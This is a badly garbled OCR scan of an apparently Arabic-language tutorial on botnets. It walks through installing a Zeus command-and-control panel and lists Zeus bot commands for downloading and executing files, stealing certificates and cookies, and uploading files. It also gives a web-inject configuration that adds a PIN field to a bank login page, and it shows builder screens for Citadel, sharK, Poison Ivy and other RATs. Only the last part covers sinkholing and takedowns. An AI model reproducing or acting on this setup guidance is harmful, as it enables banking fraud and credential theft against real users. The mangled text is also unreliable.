MySOL^Aw^'j* > ou*? > jananoreen.beviha.com > > W> «• 

_U22*731182 MySQI CAJiiV^tt^ 

.U228731182 MySQL ^^i—,-! 




pZcuiBot.. ■■ 



i Setup Zeui I 




->»•» ■«■ " '■ ■ •>* ^ ^*»** *«>*-o* 0*^4 -MySQL ^-»* 



MySQL c-^j^i^s 



^^ostlneer 





>— MySQL 







(•n* .U228731182 MySQl 
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.I^jL&I ^1 CjUUJI S^clS .k^U L^lilk ^ ^Ij ^Vl^ AJL!^\ JjjS jiill Aju -5 



-*=» <* Ci 



.U22873M82 MySQL 



phpMyAdmln J 
Mys.jl ^ 



MySQL 

my^ciino-:tir»B» ,r 



MySQL - 



MySQL ■ ■ & m?i* 

my sq I . hosti n ge r. ae 



MySQL f 

U22S731 1 S2Jana 



MySQL ^'-r^H j 

U228731 1 82Jana 




ph p My Ad m i n 




Assign pri\ 



GREAT E H^l 
CREATE TEMPORARY TABLES F^l 



I NSERT 
REFERENCES 
5- HOW VIEW 
UPDATE 



-JO- S 



ALTER 
CREATE ROUTINE 
CREATE VIEW 
DROP 
INDEX 
LOCK TABLES 
SELECT 
TRIGGER 




Uki U£ ^UJI <kaaJ zip 41* ^ server[php] ^V^l .ki^ ^ jIjj Zeus ls ls^ s^ij -8 

.Chmod i> <r 4-^»UJI CjU^^JI j^j system ^V*^ 777 global.php ^ -9 

Jlld install ^ UUxij c ^j3I jajjjaJL <j^aLkH CjULJI C5 1c <_£ill a\\ ^ AjL^jh li*a ^ill L_fljjJaxJI ^1 t . c^Ui a*j -10 
: ^JU3I J\ c_jUi3! ; http://jana2.byethost7xom/server[php]/install:c r 5 ^ 



£il« Edit 
f 


n * 


»> CP 


Control X 






? n a 1 byethost7.com s erver[php]/install/ 




v e H~ Goog/e P # £ ♦ # © " 






LO ilJUUUJjJI fi^S*li\ i>jj S ■ ,'i^ii7wK Jl J" 


0 FortiGuard.com | Zeus,... Q How to setup Zeus Bot... 11 Remote Administrate... 


_j [Tutorial] Setup Zeus B... £ Egg List | Dragon City ... f — Get random gem [Max... 





This application install and configure your control pani 
this server. Please type settings and press 'Install'. 



User name: (1-20 chars): admin 
Password (6-64 chars): 



Host: 127.0.0.1 



User: root 



Password: 



Online bot timeout: 
Encryption key (1-255 chars): 



l*1 Enable write reports to database. 
LZI Enable write reports to local path. 
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.install c3j^ f I^jIjouI ^^jI! CjULJI S^otaj I g j; ^ j^j ^jujLoJ! J^-^- (j-* -11 



Control Panel 2.0.8.9 Install 



This application install and configure your control panel on this 
server. Please type settings and press 'Install'. 



User name: (1-20 chars): | admin 
Password [6-64 chars): 



L234567B] 



Host: 
User: 
Password: 
Database: 



| mysql. hustings r.ae 



|uBQ756i774Jan3 



|cpdb 



Online bet timeout: | 25 

Encryption key (1-255 chars): | hello 



znable write reports to database, 
0 Enable write reports to local path,, 



jI^cVI ^Ui Jc- JjjI ^LJUll 2LiUill j^ki Install J*- ^ 



ESESES3 



* Connecting to MySQL as 'root'. 
» Selecting DB 'cpdb , 

* Updating table 'botnet_list'. 

* Creating table r botnet_rep-Qrts\ 

* Creating table 'ipv4tac r . 
i Filling table 'ipv4toc'. 

► Updating table 'qi users' . 

* Updating table 1 botnet_scri pts 1 . 

* Updating table I botnet_scripts_stat I . 

* Creating folder r _reports". 

* Writing config file 

- Update complete! — 



Botnet Administration 

"http://jana2.byethost7.com/servertphpJ/cp.php" ^ cp.php ^ c> f£a3l! J) ±*j 



CP :: Summary statistics 



Current user: admin 
GMT date: 03.11.2014 
GMT time: 11:26:47 



— Summary 
OS 



Botnet: 

Bots 
Scripts 
Reports: 

Search in database 
Search in files 
Jabber notifier 



Information 
Options 
User 
Users 





Information 


Total reports in database: 


0 


Time of first activity: 




Total bots: 


0 


Total active bots in 24 hours: 


0%-0 


Minimal version of bot: 


0.0.0.0 


Maximal version of bot: 


0.0.0.0 



[current botnet: E 


J Reset "New bots* | 






j -- Fmpty -- 


-- Empty -- 
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J\ "NAT <J^b" e ^kio^ ^ ."filter" ^ yi lP 3 ^ g?^ <"Bots" j* >^ . 

.^UlA^U Sjtfl jSSVl ^ jA\ a^^'W ^ cilli Jj Uj <"J^1« j^" ji "jjV oJ" <"NAT £ j^" 



Bots : 
& o-tr-i ets : 
IP-add re s s e s : 
Countries : 



NAT statu jt : 
Online status: 
Install status: 
Used status: 
Oon-ir-nents st; 



Bots action: | Full i nf o rn-i ati o n 


















ZF — | 






1 1 bot 1 ODD ODD 1 plag 


1 


2. 


4. 


2 


152. 


l&S. 


1. 


8 3 + -- 




O . 


OOO - 


1 2 vb4 OO DSbSee plag 


1 


2. 


4. 




152. 


ies. 


1. 


3 3 :+: -- 




O . 


ill "Ii ill good one 


1 3 vb4 O O Of7e 5 plag 


1 


2. 


4. 




152. 


l&S. 


1. 


33=+= -- 


03:0^:01 


O . 


OOO - 


1 4 vb4 OO 1593af plag 


1 


2. 


4. 




152. 


ies. 


1. 


33=+= -- 




O . 


OOO - 


1 5 vb4 00276d75 plag 


1 


2 . 


4 . 


2 


15 2. 


i & s. 


1 . 


S 3 =+= - - 




O . 


OOO new config 



ojLudjj L_fl^x-o j& "Bot ID" j 3 j^l Cja cJ^ l! A-jjujLujVi cjL* jlx-<JI (j^asu ^jia^su c _^j3!j ^LajIs ^jia^xja "accept" (Jj^ 

.^^klaiJI Jjs l^jflUiaj dbdj ^1 djllilsu ^1 "Comments" UjUtS 
11 Full information 1 J^JI lW^ J j^aaJ I ji^j ^1 ^j^II i> lP 3 *^ ^li u ii ^ l 4-ajU3I ":Bots action" 

^a^klaij j ^.^ImJ <Jj£ ^ Ia^I^C-I ^aJ ^jJl Ajj^aill £C*lji3l (j* 4_AjUi (jla^su ^ill j '"scripts" ^^HJ^ <xjU1I ^ JJ^aixJl 

,CJ jJI 4_ix»jJaxJl J-aljVI (j-a jl ^-Ij cJ^jV a J L ^11 £cxil^)j3l 



Wcti o r-i 



| Enable 



J i 



Wd d i-i e 



J 



□L 


s cri pt_l 253^550^l-6. 


Disabled 


2 4 


O 9 


2009 


O 1 


1 3 


2 5 


1 O 


O 


o 


o 


1 


s cri pt_l 


Enabled 


24 


09 


2009 


19 


23 


50 


3 


1 


1 


o 


1 


s cri pt_l 253331536 


Disabled 


24 


09 


2009 


22 


33 


37 


io 


o 


o 


o 


1 


s cri pt_l 253925323 


Disabled 


2& 


09 


2009 


OO 


3& 


23 


3 


o 


o 


o 


I - 


s cri pt_l 254174347 


Disabled 


23 


09 


2009 


21 


4& 


40 


3 


o 


o 


o 


I - 


s cri pt_l 254251770 


Disabled 


2 9 


O 9 


2009 


1 9 


2 2 


3 6 


3 


1 


1 


o 


1 


s cri pt_l 254253445 


Disabled 


29 


09 


2009 


21 


OS 


41 


3 


1 


1 


o 


1 


Copy of script_1254251770 


Disabled 


29 


09 


2009 


21 


46 


09 


3 


1 


o 


1 


1 


s cri pt_l 254264606 


Disabled 


29 


09 


2009 


22 


50 


40 


3 


1 


o 


1 


I - 


s cri pt_l 254265016 


Disabled 


29 


09 


2009 


22 


57 


11 


3 


1 


o 


1 



jjjIIluJ! ^-^ajj -yH^ J jj^ 3 * . 1 J" 1 J ^ ^ ^j^Jt ^UjujVI jl "Add New Script" 

^UjJI j^lji (> jSSl jl JLkjj jSaj context ci^^ .location based services (LBS) cjU^J ^ 11a .SjjSUI 



M -3 & : 


- cri pt a_ — — O 




Statu jt : 


L- i s 3 t. 1 e .=1 ^ I 




l_i m it o-F s s r-i cd s : 






l_i st of t. ots : 






List of botn^ts: 






List of ■= •=• untries : 






[?] O o |-.t= >:t : 


■g etfi Is cd : \ ■_! t o ru n . i nf 





■=■ I I tZirsats i-i ~ ■■■■■ script fror-i-i 



ISO 



Bots a«=ti 
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[Available command 




Reboot computer. 


kos 




Kill OS. 


shutdown 




Shutdown computer. 


bc_add [service] [ip] [port] Add back connect for [service] using server witn address [ip]:[port]. 


bc_del [service] [ip] [port] 


Remove backconnect for [service] (mask is allowed} that use connection to [ip]:[port] (mask is allowed}. 


block_url [url] 




Disable access to [url] (mask is allowed}. 


unblock_url [url] 




Enable access to [url] (mask is allowed}. 


i_. 1 _ ._ | .. 4: _. 1 . ._. r , ...in 
block rake Lurlj 




Disable executing of HTTP-f a ke/ inject with mask [url] (mask is allowed}. 


unblock_fake [url] 




Enable executing of HT TP-f ake/inject with mask [url] (mask is allowed}. 


rexec [url] [args] 




Download and execute the file [url] with the arguments [args] (optional}. 


rexeci [url] [args] 




Download and execute the file [url] with the arguments [args] (optional} using interactive user. 


lexec [file] [args] 




Execute the local file [file] with the arguments [args] (optional}. 


lexeci [file] [args] 




Execute the local file [file] with the arguments [args] (optional} using interactive user. 


addsf [f ile_n-iask. . . ] 




Add file masks [file_mask] for local search. 


delsf [f ile_mask, , . ] 




Remove file masks [file_mask] from local search. 


getfile [path] 




Upload file or folder [path] to server. 


getcerts 




Upload certificates from all stores to server. 


resetgrab 




Upload to server the information from the protected storage, cookies, etc. 


upcfg [url] 




Update configuration file from url [url] (optional, by default used standard url} 


rename_bot [name] 




Rename bot to [name]. 


getnnff 




Upload Macromedia Flash files to server. 


delrnff 




Remove Macromedia Flash files. 


sethomepage [url] 




Set homepage [url] for Internet Explorer. 


l^llj J^ll ^\\ L. 




Web Page Injection 



set_url http://www.bank.com/login.html GP 
data_before 

name="password"*</tr> 

data_end 

data_inject 

<trxtd>PIN:</td><td><input type="text" name="pinnumber" id="pinnumber" /></tdx/tr> 

data_end 

data_after 

data_end 

ls J^i datajnjectj <^ <Uc c^l] j^ll ^ ji^> datajbefore lU«1I j <>? j^SI 4^*^ set_url lU«1I 



| ■'U Test Login - Microsoft: Internet Explorer | 


| Test Login - Microsoft Internet Explorer 


File Edit View Favorites Tools Help 


File Edit View Favorites Tools Help 


O - O - ® ® | s — h 


^Back - O T S \&\ 34 JD Search 


Address http://www. bank. conn/login. html 


Address http://www. bank.com/login.html 






Usemame: |~ 


XT s e i ii am e : |~ 






Password.: |~ 


Password.: |~ 


Submit | 


PZN": |~~ 




Submit | 



,Aja1 > >iVI <J ji^JI aAasu (j>» ^jj^a JLudjj ULajJall 
,data_before ^ i^V j .o^JI HTML > ^ 
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<TR> 

<TD>Username:</TD> 

<TDxINPUT id=username name=usernamex/TDx/TR> 
<TR> 
<TD>Password: </TD> 

<TDxINPUT type=password name=passwordx/TDx/TR> 
<TR> 

<TD colSpan=2xINPUT type=submit value=Submitx/TDx/TR> 

.ailcl Ciiijj j£\ data_inject J^JI _>j ^'-P) t* 'u^J' HTML ^ l*aj 

<TR> 

<TD>Username:</TD> 

<TDxINPUT id=username name=usernamex/TDx/TR> 
<TR> 
<TD>Password: </TD> 

<TDxINPUT type=password name=passwordx/TDx/TR> 
<TR> 
<TD>PIN:</TD> 

<TDxINPUT id=pinnumber name=pinnumberx/TDx/TR> 
<TR> 

<TD colSpan=2xINPUT type=submit value=Submitx/TDx/TR> 

jja. JSJij ^ ja^II iijj] i( jjjU*JI <>> 100 <>> jSSl uaaJI aa^J ^uialjjaVI dbl^c-VI (^Ic ^LaJI Config Jta&VI ■ <_sjiaj 

Citadel Zeus botnet *k 
."web inject" xaljJI u*a. UJj 

|Cj jill siiAa. dll jj-o .i-Jjjll ClAjj£^j Ajoiflj til jjl «.! jjjj -la. ( _ 5 lc 



Control Panc-I 1.3.4.5 Installer 



T r is appicaucn iralall ana configure your co rated 3 panel oei in is server. Please type aer'-ss ard press Trastair. 



Usms name-: i 1-2Q oMars-V 
Password <e-s* chars}: 




] _re|wrlBl2*BH977 



Onhne bot timeout: 

Efttryptiefl key (1-2SS fiftara-X 

3 EoaSle vjfee re^on* jo datacase 
[H Enable vjf<e rejeri* ?o fiocai path 



- install - 
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del Builder 



' _ 



M 4 m i 



lUrrertt version 



Citad 

Universal Spy w an? Sysfr 



Build tirrce: 22;23:30 3D. 09.20 1 2 GHT 
Signature: avfcree 

Log^n key: C2^1ElA9C3E93372f>3DS&0EfllE7AE42 




bot 



Configuration 
Source configuartion frle^ 



Language: 



Enghshi 



D C 



E^id ti-te bet 



BgJd the bot J fes-pi q*.y 




e^dbte JiihrtlO_pci4t?- 1 

3iTOmu4a**eci_erfca b*e = 1 

padksge_iY¥ax_£Lze— 51200 bybes 

us e _fiftod u he _vid e o 1 

erfCi- ypt lori Jfcey = OK 

£rejatmg executable File... 

Seb rj oufcn* fye is 21339^ byt&s. 



GameOver Zeus botnet [GOZ] 4- 
■o 1 jl ^ jl^!)U CjU jSJI ^ Jc ^IS "p2p botnet" p2p J^ j* GameOver Zeus botnet 

^JJ 201 1 ^J-^' GOZ 6L -^J^J^ L>^ *Vi AjtjJaJ ^i^J ^ ui dlJJ jill ^3^^ sl^lS U^jO U^ 1 ^ LS^" ^-^j 

• mi y& a! J£ Ujjij .l^iU^kj l^U_ii* *l jj^J dij jjjVI ^ tajjoj "underground economy" (jj-JI 
clA^ "do-it-yourself (DIY) botnet kits" jj *L5d_l cjIc; j 4^3*^ djU^k t<a jj-j-JI jL-ujVI cjtalkj 

jjU .2006 f lc <^ s J jV ^\ '"Zeus botnet" lhjjj^ >-~-ll fcl jj^ yr* J 5 ^ 1 DIY u) J jSII 
^liij .Citadel j ICE IX f-^W s^j^aJI cJu jjjjJI qSIcj^^ dj-J j jll j t^jjj ^ ^j ^^l l ^jjj-j-j <201 1 

jAjl^q J j ja. j-q <Jli_l£ Jll <-___! jjoJI CjI ^^L^l <Lg,i__ £.!>L<-x__ jSjjj <j__ijVI CI12-J jj Jll CjU^UxJI J^lk ^j-o CjIc ^j-q J£ 

cjIjjjjjII ^ CjIc j-<^a3I AiLjaVU . jj^li J j> > uj j sandbox detection <J** (J^ 3 ^^ u^jO 

^^Jl Cik^ 2010 jjj^f J domain generation algorithm (DGA) d^^a j ^Murofet/Licat 

Ij^ Uui^j P2P Zeus .GameOver ZeuS Ljajl cJ^xj ^illj 6 p2P Zeus j ^^t^ c^iijJI ilji^ll 

^^iLd j (JjUaLJ! Jj3 ^ n>i^ djl£ ls j1\ 'C&C lS j^J - ^^ ^Saall (J^J <jV 'U^J^J LSJ^^ Cjljl^aVl (jc 

2012 U^J^ C^J^ cJ-^ jjujjj^jU» ^liij ^ jjJa 4 > ^al ^ (JjAxjII li^ P2P ^f^j t^jjjlill 

^1 j^JI ^ a^c j j^3l ^ 147 cs-^* ^-^f^V^ ^ a\\ l$ jcJI £>i& dj^l j .Operation b71 Uj^ r " cS^ 3 ^ c5 

P2P Zeus <^ j^ 3 c?' ^ lUJI liA c*j .SpyEye botnetsj 'ICE IX 'Zeus J ^^i^JI 

J>isu "peer" u'j^' 6 ^ - ^jj^kVl ^^IaxJI ^ -lajIS ls 1c laal aj l-jL^q J^c- <J^ 'P2P Zeus j-^ J .W-^f^ 1 
djUL ^Jjii tdjllj^jll jJii3 "peer" u'j^*^' ^V^a ">.nj . (ji L* a jol \ (jjiiijJaJI j P2P ZeuS botnet Jx-^J ^^-^ jjj 
<>i^JI ^ ^jU^.^)3l CjUiaA j Ajaj^flll CjIjUJI a^jjoj StaV! .^£^j3I CjI^. j Jj a£ jjjouJI djUUJI <JLaij!j t^jjj^iill 

"DDoS" 

J L_astjJa3l Jalajj AjcUu^VI <joj^JI ja. Jc Axusu 1 ^ ^ J j tAlnaJ) ClaLia jjaiil CjUjalill <c jaL* <c a (ilLiA 

Jt^jV ^spam botnets j^' c> 'Cutwail botnet u^j^J P2P Zeus j^j ^tjj -s^'j^'j ^ u 1 ^ 

.exploit kit Jj ^^^3^ ^ 
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(j-a .iJ jj! jill - ikiLaLjj 4ic <jUj ^cc ^jJI JLujjV Aijii^xJI a ^lajVI ^ dlla Jc Cutwail botnet 

Ain^JI CjU^jJI jj^il ^^klujj Cutwail spam botnet .^3^ Al>^' jfi^* u-* Mjf^ J jj^V^ ^j^' 3JLui j J Cjla^likVI 

.P2P Zeus botnet J L >a ^i^ 
s j^jj l^j^ PHP s^j 4-6^ jj "builder" ^iifkJI j^' CjIj^VI c> a^^*^ Jc ^ ji^j U£ jib Pony loader 
J ^jaujal l ^Ikj ^ih Ubjl ^ jL Pony <P2P ZeuS malware ^ j AiL^VU .s jLiJI ^1 jA\ ^jjl j 

ci> jj t> jaJE ^ Pony loader jJI ^1 >^ c> J jj^V* ci> jj j 'FTP/SFTP <HTTP/HTTPS 

.>5- POST HTTP ^J^c> Pony C&C ^ J\ >^ 



ZeuS v3 P2P Network 



1.) The bot contacts a list of hard coded IPs from 
the binary using UDP on a high port (something 
like- a P2P botnet) 




■UDP on high Port- 



DP on high Poirt- 



1. \ The bot(s) sends back a list of 
IPs from other drones 
participating in the botnet 



-TCP on high Port- 



4.) The bot gets the config- and 
binary update from the P2P network 
sing TCP cm a high port 



Infected Computer 



-TCP on high Port- 



3,J The bot register himself at the ZeuS 
botnet controller sending a HTTP POST to 
gameowerXphp to the botnet C&C This 
method Is also used to send the stolen data 
to the C&C 



HTTP POST /gam&over2 php- 




. ZeuS Botnet controller 



.CryptoLocker ransomware <y ^y^& Jli^VI J ^ Jj r^vim l GOZ t <-*Vn U j .. i Cf- j^j^ 
di^Laj ^§ Tovar l^lc JIal 4jL&c> J AJj^ll jJI ^ji 4_ifLj>»VI Sj! jj dilc.1 ^2014 J 

.4j f^lj sjUSI! ^Ija.j GameOver ZeuS o£ ^> c^Vl^l ^ J 
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Syma ntec 



jliijly^! ^Sij^i DDoS *L*V ZeuS botnet W J\ ^ & SUl Dirt Jumper :<&j*1a 



Botnet Trojan: shark 



"firewall- bypassing" 4_>J-^ uU^' JjW^j "reverse connection" g^*^ JU^iVI ^ Wi .. n axj JL^jI ^Ujj shark 
(jcr ( jjAbj (Jjt ^"\\\ ^Uaj ^lAaJLaiU) jj jju^ (J 0 uj^ ^ 'sharK .VB6 j 

. jj^J! jA^ m RC4 - 
mJJ j*l\ Vit i ^iI zLib 
s jii^ <4ila <c cjli screen/cam cCapture 

jjJall !n J lull 0^)±A £A jp* 

.^jja c^LjSj t ; ujuaj "registry editor" J> dAiL* jj^^/lIA^LhI] jja* ^LaiuaVI 
Anti: Debugger, VmWare, Norman Sandbox, Sandboxie, VirtualPC, Symantec Sandbox, Virtual Box 

.SIN f^'fll j L_Li£-<Jl ^ciajoj 

.SIN f^5' s^j Jja - 

Optional Fwb++ (Process Injection, API Unhook)! - 

Folder mirroring 

drmohammed.no-ip.org ^ 

Download Client 
Upgrade to Enhanced 
Need Help? 
Support Center 
Troubleshooting Guide 
Dynamic Update Client 
Support Ticket 
Contact Us 



Hostname: drmohammed 



Host Type: 



Assign to Group: 



® DNS Host (A) O DNS Host (Round Robin) O DNS Alias (CNAME) 
O Port 80 Redirect O Web Redirect OaaaA(IPv6) 



196.205.100.240 



- f Jo Group - 



IB® 



Configure Groups 



Enable Wildcard: Wildcards are a Plus / Enhanced feature. Upgrade Now! 



0 
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sharK Desktop Preview IRC -Chat Website 



1 


1 


Country 


Username PC Name 


1 


CPU 


RAM 


Idle 


Version 


Ping | 





















































































































































































































































































































































































































































21 PM 
21 PM 
24 PM' 
24 PM" 
28 PM" 



Initializing Client. . . 
Listening on Port: 60123 

sharK 3.1 fwb++, Last Compiled: 30.03.200S 
Updatecheck. . . 
Update-Check Failed! ! ! 



-I 



harK 3.1.0, SAM A 

irmation L. o >; refreshing its content e -j e ry 24 
□ u will get information about new sharK 
states and other releases of 



ck Z 

Copyright 2007-2008 C <=3 BoredCoder: 



shark 3.1 fwb++ 



Port: 60123 



;4_JU3! 4^Ui3l j^-kia ^ liuiia ll 4^jU3I ^ Create Server ^ o*j sharK ls ^ j^VI -^j^ c> 

sharK Desktop Preview IRC-Chat Website 

— r— r— : r— 1 r „._ ., rr — nrr- 1 r , ,.,,„, ttt fZ — '■ H" 



^ New Server 



4:13:21 
4:13:21 
4:13:24 
4:13:24 
4:13:28 



PM] Initial 
PM] Listen 
PM] sharK 
PM] Updal 
PM] Updal 



Last Author: Hackers 

Created: 8/31/2010 9:50:18 AM 



Compile Summary 



5ervernarne: 
Server EXE names: 
Server file extensions: 
Target directory: 
Server Type: 
Server mutex: 
Server password: 
Connection interval: 
HKLM Startup: 
HKCU Startup: 

SIN Hosts: 

> 127.0.0.1:60123 (Not tested) 

Blacklist: 
— > No items! 



Serverl 

YXj69vbo., rbrVF9LGj KuvYSxoHR, FTLgGS6j ICRe 

.exej .pif, .cmdj .bat, .com 

Application Data Directory 

Fullserver 

sharKtiilY7EUfh 



4 seconds 
Activated - Keys: 
Activated - Keys: 



E E EC 



Server2 



fe4 

Server3 



-J 

Server4 



<i 



Regards j 
sNiperl09 , 



Copyright 2007-200S (c) BoredCoders.com 



<jujLjd3l ^Jaj ajUlk! Asuj Ajjooj L_a jjuj jajjjoJI ^jujI tilid t . lilaj <^^j New profile tjj^ (* 

Desktop Preview IRC-Chat Website 

1 t r~ . j s- u.... j i i | ,-.„- ,., | j , | n , M j T _H. 



J ~~r, 



New Server [sharK] 



Basic Settings 
■fjjfr Server Installation 
' J Start Up 
™ Install Events 

fBind Files 
Blacklist 
Anti Debugging 
Stealth 
. ./ Firewall Bypass 
M| Liteserver 
r,7 ; Advanced 
yj^ Summary 
Compile 



[4:13:21 PM] Initial 
[4:13:21 PM] Listen 
[4:13:24 PM] sharK 
[4:13:24 PM] Updal 
[4:13:28 PM] Updal 



Servername: 
Server Password: 
Connection Interval: 



jsharK 



|rpl_wUyQjGGq[plit4mAD 

-) 



Enable offline keylogger with maximum logsize of |ioOO KByte (0 = Unlimited) 



SIN-Addresses: 



Save Current Profile 



Test Hosts 



Regards, 

sNiperlQ9 and rockZ 



Copyright 2007-200S £c) BoredCoders.con 



Save Current <jj* ^tac-VI ^l^VI a*j ^5 aULi^l ^ill t LjJa^H ^1 J^ij U-^j Add cjj^ j^W ^ 

.^ qj^^ l ji ^^i'^ j^j * — aL^il Uiija Compile <jj* j^j Compile ^ C5^' ^ISSI ^ ^ 



1104 



Poison Ivy: Botnet Command Control Center 

fS&Aj jLl* y^-^ ^ ^ "remote administration tools" ^ uf- c> ^ j* Poison Ivy 



EKJIm I27.aa. 1:5*0, 



1 123 



as 



Qj Writ 

a 





MdBtil 



r 1 - - 



ATii *nr cii»- rid.. 



L .- tI-i 

I hhliHld 

I ■ Ml 

LvtubLii 
Owe. EM 

I - ■ - " . . 

- I^. H , .j ... 

I - ■ ■ i. 

I ■ " • -I 

EhmdSr.. 
I - - - ■ i . 
DMltQl 

l «mci CM 
C**u*EH . 

Shiii.l Si.- 



sr'npptc 



■ Jiir.iiiu 

: I ■ I 



StHiipljpp log mat 



^rnnTD i"«*M 
■sruppEU- nirw 

iiimhi. 

-" I "-L 

— jr^rc 

- ii,- m 



.--..I 

4jl»IW*M 



Botnet Trojan: PlugBot 

http://www.redteamsecure.com/labs/the plugbot/plugbot-penetration-test-tool :>^*5I 

4-AjuLj jjt > r\ jj jl^a. PlugBot .^pLalt (j^J-^*^ t — ^jW-*^ *™ L^J^^ ^Ia^Luj^U ^ ^ > ^ ^ ^Aj J^-?> jA PlugBot 

J PlugBot is a hardware botnet project _ 

-J It is a covert penetration testing device (but) designed for covert use during 
physical penetration tests 










LTTl 














Dashboartl 
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Gigabit Ethernet jSjJ <JjI£ 
.MySQL j PHP < J j£ <l>^ <^ 



Botnet Trojans: Illusion Bot and NetBot Attacker 

Illusion Bot 

.IRC jl HTTP c> ^ C&C '* j ^ - 

.(Socks4, Socks5) yr^jj^ 1 ^ - 

.FTP - 
. jjuJI CjUKI MD5 

.Rootkit 

"Code Injection" - 

M IRC j - 

.XP SP2 "ifl ^Uiij o^UJ! ajL^JI j!^ <> jj^JI - 

DDOS - 



llimon Mikei 



Brmy C;VD<*uir*rtt ml &^ings\Wir W j^P4CC^Cf0^B0TEIMAR^ EXE 
IRC Admnia (ration 

1| Host 100 CI Port &ES7 Chu 

21 Host: 100.Q1 Port M57 Own tfchan 

1| Host 
2| Host 

Dclaull services. 

Soci;s4 pat. 

^ SocksS. pat 

FTP. pert: 

IflCAccast 



Reload 



Pass 4lest 
Pass 4iest 



Port 
Part 



Refresh hm*. 



Path 



V Pandora i«ngje 2001 
firtfchdl port 



3000 



BOT PASSWORD OVMSly 



MD5 Crypt 



0 pliant 

* triitdl kernel Oitvei 



V Auto QP aJwn on JfiC channe * RC ser/er need pas wo d 
* Lctofd i Hi message? * Add to nuudVak«s 



NetBot Attacker *k 

jjjlij j j-al jVI jl^aV I^j j^, ^ " >> n jjLa^l^ll .dii jA\ s jla^uiM ^ ^IuiaM a Uu*\ jj^jj NetBot attacker 

^jj U^jc- s .EXE j& j^Vl j INI .RAR ^ jjjjI <j| .CjU^JI j*\ J)t a^!L <cjKu*11 
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,1.4 Engli,hv 



0h"line hosts Attack Area Collective order Use help 




||PC IP 


C output er 




Memory 


Service edition | 




A5667F15B8E94BD 


WindowsXP 






pj219. 159.4.24 





















































































































































































(Monitor port8080which|| ||Security warning team( www hackeroo.com) | |H ad 1 PC on-line | 

^.LuijV 3_A^kjjaixJI toolkit ^ ^^-c- .lg-^hviml <L*lx]| Sj£i3! ^i^a jiiJ ciijj jJI CjI j^I axj J jUj Ujgj) ^5 j ^jVI 

JiHj L_fl jjoj (jVI .4 Ux a dilc j ^ ^ ^aj^a^xij 4_x»txi3 (jlxxJl ^)JC. l^-i^j (JL<JI (JjLLg l^iftj *^ a A\ j 4^1x13 (jlx-<Jl lg Cllj ^aJl 



Battlefronts against a botnet" ^j^jj 2 * ±* Jt&U 

cA ±* (^^-Sc ^Ljakllj Aijl^xJI CjWI £-3 u^j ■ t a^u^l jjUiS l_a jjoj djlj jjj^)3l q\ (iLuilj .(Jjjjj 

^j) (j^J jIj jjj^)3I _dij jJlj ojUiall Cj^IjIc Qii OllC-is-tO-OnC ^^jujI^ <^3Ua ^ a.^<U t . r^'^ <ln^J| ClaLi^ 

^3 ^gAaaH dlJJ I j> >ir> (jj^J (jl 6^Axl<Jl ojLjall £c^!^)J! ^j£-<»Jj 66^^*1* ojLjall £c^!^)J! dj^Ulc ^AaJLujJ 

L_L^J Ld£ .CjIj jJj^)3I ^j-d j j> li^ j .1 dlaaj^a) ^^jll AjAlkjj CjUai ^xj ^Aa3 l^laj 6<Jxi3U L_flJjJa^ll 

."The technical front" ^?J1 - 
."The legal front" W»« - 



"The technical front" 

."Network" a^jJJIj "Host" t a^a^ll j^jj^ ^^hj^^ o±^\ ^^>*-^^ j^j^ ^jiill/^uili 4 ^ ±a II 

M Host Component' 1 uLJiaII ^ 

"Network Component ?f ^ 
^Drop Zone ^ uj^^ ^W-^j^^ ^C&C y^^- J^A^j .^j/MI j>^>V' x^ J^lxlll tj^j cil3^3 jjjjl l 
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^^Ic ^LuixJl lafll L_fl jjoj l—Ua . ^Lu^o .Ua ^aL-£a^)ll <jxi <^lj ^ J^-J ^1 .4_l£juixJl 4_Jj^aJ! L-jUj^VI ^ ^ a Ajuj^U .jL-ajVI 

(jl t . AliikJl CjLi^xijJl L£*^ <£fuJI (jl£ tAKjuLall ^j«iaJl t . UjuJj J jj^a jlJ <jc I^isu AjfLliJl iaj ^aJJ ^1 La jUll (_$!>Ual 

/a^Ull <-dJ^C dltj jJj^)Jl ^usyft iC-ul A^Jjui (jj^-a 4£jjuJl (jjJ (jxi <j| L— Ll^ _4 LHjuJ ^aJJ 

D^A ialLajV CjU» jlstxJl ~\ I^JLujI ^aJJ (illi «^*JJ ^ Cf-^* ^^-^J f^"^^ J^ L - L ^ A^Jjui CjL j^xj £xi (JxAjtjll ^jVI 0 J^*^ 

Sinkhole 
Takedown 

J^lL li& ^ji^jjj .a£jJo3I til jLoj j CjIj jjjjII JL^ajl ja^i ^1 (jii^LlI j jlJ cjIj jjjjII ^jl ^ ^^ic ojinju^l ikl Sinkhole 

.sinkholing 

o^j^ll "hijacking" ^Ualkl <C&C <cjIjjjjj1I a£i£ ± a_£L C5 ]c Jj^*JI 4_iLc :Sinkholing 

CjIj jJj^)JI (jL^ajl (^^ic (J jj^a^Jl (jxa (jjl^.ljll ^jS^ftJJ ^1^. Lfrll^j ^ ^aJJ (jjlxaj.^11 „ C&C^ (J 1 "**^ 1 ^— l^J jJj^)ll (Jj3 (j-a 4_xil,laJLuil ^aJJ 

:gr L La ^ u^y^ t j ' ^j sinkholing c> 

"Location of compromised systems" aSjI^JI l^Vl 
." W/ia^ information is being sent by the bots" ^tSjJI ^> l^IUjI ^ ^1 c^UjkJI U 

jj^aixJI lS^^ 4-^^ '^^^ La£ .dilj jjjjll ciiVL^ajl j ^ CjI^cLoixJI ^a^lj Sinkholing I Takedown 

aSliA ^jl ^ j^jxj jl ^cSl ^^jI! 4_iL^j]| j! <£jjaJ! 4^^. l-jL jl CjIj jjj^)3I ^l^jl ^1 j^jj Botnet takedown 

_<Jc. j& c ^j3I ^ jj ^^Jc ^Sjii I^a j tl^. L-ixj^a jl 1^. ^j/Ml ^jl ^ "tacking down" -l^LLu^} _ja ji* j^t. £±& jA\ 

AilLkxJl ^jc ^!>LV1 (j-a ia^a j^judj l^JalL nl (j^J ^ jAslSI dj^iU£ til jJjaLiill L_jLai^. ^a^kjjaaJ c _^j3I CjIj jJjjll 6 Jll<Jl J^f^ 

CjI^JjoJI ^jl ^3 / Ll a. .il j^. (J^juJI ^jxi Ljajl djlj jJj^)1I ^^Ic O^LaJjalll ^ iklLuji ^aJJ (J?'^ < jL ^ j;'"J Q ^ L_jLud^J 

L-Ixj gall blllletprOOf AiLjalaiVl <^^^" l^iaLjalajl ^aJJ c _^jll A^jJoll Jjt a iklujj c _^j3l CjIj jill tilU^i tl^ LUjujI l^a. J^juJ\ 

